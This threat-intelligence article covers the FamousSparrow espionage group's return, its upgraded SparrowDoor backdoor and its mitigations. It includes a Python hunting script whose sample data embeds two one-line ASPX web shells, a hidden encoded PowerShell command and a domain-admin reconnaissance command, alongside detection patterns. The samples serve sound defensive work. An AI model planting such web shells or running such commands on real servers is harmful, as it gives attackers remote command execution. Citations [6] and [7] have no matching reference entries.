
After a period of apparent inactivity, the China-aligned cyber espionage group FamousSparrow has reemerged with upgraded tools and tactics, targeting organizations in the United States, Mexico, and Honduras. According to ESET research and industry reporting, the group has compromised a U.S. financial-sector trade group, a Mexican research institute, and a Honduran government institution since mid-2024 [1], [2]. This resurgence highlights the persistent threat posed by state-aligned advanced persistent threat (APT) actors.
Reemergence and Updated Tactics
FamousSparrow, active since at least 2019 and thought dormant since 2022, has returned with two new versions of its signature SparrowDoor backdoor. The group exploited outdated, internet-facing Microsoft Exchange and Windows Server installations, likely leveraging ProxyLogon or similar vulnerabilities, to deploy IIS web shells [3]. ESET researchers also observed the group using ShadowPad, a backdoor previously associated with the Chinese group APT41 and shared across several China-aligned actors, suggesting collaboration or shared tooling among Chinese threat actors [4].
The group’s post-exploitation activity includes remote PowerShell execution, file exfiltration, and lateral movement. Notably, the new SparrowDoor versions add a modular, plugin-based design and parallelized (multi-threaded) command handling, reworking the code architecture for stealth and persistence [5].
Victimology and Historical Context
FamousSparrow initially gained notoriety for targeting hotels worldwide before shifting to governmental and financial targets. Recent victims include:
- A U.S. financial-sector trade group (breached June 2024)
- A Mexican research institute (July 2024)
- A Honduran government institution (compromised intermittently since 2022)
Microsoft has folded FamousSparrow into its Salt Typhoon cluster, and the group has also been linked to GhostEmperor, but ESET assesses that it operates as a distinct cluster with only loose ties to other Chinese APTs [6].
Mitigation and Detection
To defend against FamousSparrow’s tactics, organizations should:
- Patch internet-facing Microsoft Exchange and Windows Server systems immediately, and retire versions that are out of support.
- Monitor for web shells on IIS hosts: the IIS worker process (w3wp.exe) spawning cmd.exe or powershell.exe, newly created or modified .aspx files under web roots and the Exchange FrontEnd directories, and PowerShell launched with encoded or hidden-window arguments.
- Restrict lateral movement through network segmentation and by limiting where privileged credentials can be used.
ESET’s report provides additional detection rules and indicators of compromise (IOCs) for threat hunters [7].
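The web shell and PowerShell monitoring item above is the one most readily turned into a concrete hunt. The Python script below is an added example, not code from ESET or from any of the reports cited here. It runs two checks over constructed sample telemetry: process-creation records modelled on Sysmon Event ID 1 (flagging w3wp.exe spawning a command interpreter, and PowerShell started with an encoded command), and the contents of a few files under an IIS web root (flagging server-side scripts that both read HTTP request input and reach an execution sink). The file paths, process events and web shell contents are all constructed for illustration, and the pattern lists are a starting point of our own, not ESET's detection rules.

```python
"""Hunt for two post-exploitation traces of IIS web shell activity on an Exchange/IIS host.

Check 1: the IIS worker process (w3wp.exe) directly spawning a command interpreter,
         which is how a web shell usually runs operator commands.
Check 2: server-side script files under the web root that both read HTTP request
         input and pass it to an execution primitive.

All telemetry and file contents below are constructed sample data for illustration,
not records taken from a real incident.
"""
import re

# Constructed process-creation records, fields modelled on Sysmon Event ID 1 / Security 4688.
SAMPLE_PROCESS_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": 'w3wp.exe -ap "MSExchangeOWAAppPool"'},
    {"pid": 5012, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": 'cmd.exe /c whoami & net group "domain admins" /domain'},
    {"pid": 5040, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 5100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-Service"},
]

# Constructed web-root listing: path -> file content. The first two mimic classic ASPX
# web shell idioms (eval of request input; request input handed to cmd.exe); the third is benign.
SAMPLE_WEBROOT_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFE.aspx":
        '<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process(); '
        'p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + Request["x"]; p.Start(); %>',
    r"C:\inetpub\wwwroot\default.aspx":
        '<%@ Page Language="C#" %><html><body>Welcome</body></html>',
}

# Interpreters that an IIS worker process has no legitimate reason to launch directly.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Web shell heuristic: a file is suspicious only if it both reads request input and
# reaches an execution sink; either alone is common in legitimate ASP.NET pages.
INPUT_SOURCE = re.compile(r"\bRequest(\.(Item|Form|QueryString|Headers|Cookies))?\s*\[", re.I)
EXEC_SINK = re.compile(
    r"\beval\s*\(|Process\.Start|System\.Diagnostics\.Process|ProcessStartInfo"
    r"|Assembly\.Load|\bcmd\.exe\b|\bpowershell(\.exe)?\b", re.I)
# PowerShell -e / -ec / -enc / -EncodedCommand followed by a payload.
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_child_processes(events):
    """Return events where w3wp.exe is the direct parent of a command interpreter."""
    return [e for e in events
            if basename(e["parent_image"]) == "w3wp.exe"
            and basename(e["image"]) in INTERPRETERS]


def encoded_powershell(events):
    """Return events that launch PowerShell with an encoded command."""
    return [e for e in events
            if basename(e["image"]) in {"powershell.exe", "pwsh.exe"}
            and ENCODED_PS.search(e["cmdline"])]


def looks_like_webshell(content: str) -> bool:
    """True when the script both reads request input and reaches an execution sink."""
    return bool(INPUT_SOURCE.search(content) and EXEC_SINK.search(content))


def suspicious_webroot_files(files):
    """Return paths whose content matches the web shell heuristic."""
    return [path for path, content in files.items() if looks_like_webshell(content)]


if __name__ == "__main__":
    for e in suspicious_child_processes(SAMPLE_PROCESS_EVENTS):
        print(f"[w3wp -> interpreter] pid={e['pid']} {e['cmdline']}")
    for e in encoded_powershell(SAMPLE_PROCESS_EVENTS):
        print(f"[encoded PowerShell] pid={e['pid']} {e['cmdline']}")
    for path in suspicious_webroot_files(SAMPLE_WEBROOT_FILES):
        print(f"[possible web shell] {path}")
```

In a real hunt the event list would come from Sysmon or Security 4688 exports and the file map from a recursive listing of the IIS web roots and the Exchange FrontEnd directories. The content heuristic is deliberately narrow and will miss obfuscated or split-payload shells, so it should be paired with a baseline of known-good file hashes and modification times; the w3wp.exe parent-child check is the more robust of the two and is worth alerting on regardless of what was dropped on disk.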
Conclusion
FamousSparrow’s resurgence underscores the evolving capabilities of Chinese cyber espionage groups. Their shift toward financial and governmental targets in the Americas suggests strategic objectives aligned with geopolitical interests. Proactive patching and monitoring remain critical to mitigating these threats.
References
- “Chinese APT Group FamousSparrow Resurfaces with Upgraded Cyber Arsenal,” Infosecurity Magazine, Mar. 26, 2025. [Online]. Available: https://www.infosecurity-magazine.com/news/chin-famoussparrow-targets-us/
- “China-linked FamousSparrow Targets US, Latin America,” The Record, Mar. 27, 2025. [Online]. Available: https://therecord.media/china-famous-sparrow-back-eset
- “You Will Always Remember This as the Day You Finally Caught FamousSparrow,” ESET Research, Mar. 27, 2025. [Online]. Available: https://www.welivesecurity.com/en/eset-research/you-will-always-remember-this-as-the-day-you-finally-caught-famoussparrow/
- “Chinese Hackers FamousSparrow Allegedly Target US Financial Firms,” TechRadar, Mar. 27, 2025. [Online]. Available: https://www.techradar.com/pro/security/chinese-hackers-famoussparrow-allegedly-target-us-financial-firms
- “China’s FamousSparrow APT Returns with ShadowPad Malware,” The Register, Mar. 27, 2025. [Online]. Available: https://www.theregister.com/2025/03/27/china_famoussparrow_back/